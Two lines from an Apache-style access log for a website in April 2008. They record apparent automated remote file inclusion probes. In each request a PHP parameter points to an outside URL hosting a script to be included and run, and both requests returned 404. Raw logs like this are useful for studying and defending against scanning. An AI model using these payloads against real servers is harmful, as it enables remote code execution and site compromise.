202.60.77.241 - - [07/Apr/2008:10:17:36 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:10:18:31 -0700] "GET /logs/access_080312.log/admin/index.php?o=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
